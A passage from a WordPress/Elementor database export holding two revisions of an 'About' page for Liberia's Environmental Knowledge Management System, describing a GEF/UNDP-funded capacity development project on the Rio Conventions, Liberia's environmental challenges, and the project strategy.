to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(17562,2591,'_elementor_edit_mode','builder'),(17563,2591,'_elementor_template_type','wp-page'),(17564,2591,'_elementor_version','2.7.5'),(17565,2591,'_wp_page_template','default'),(17566,2591,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and 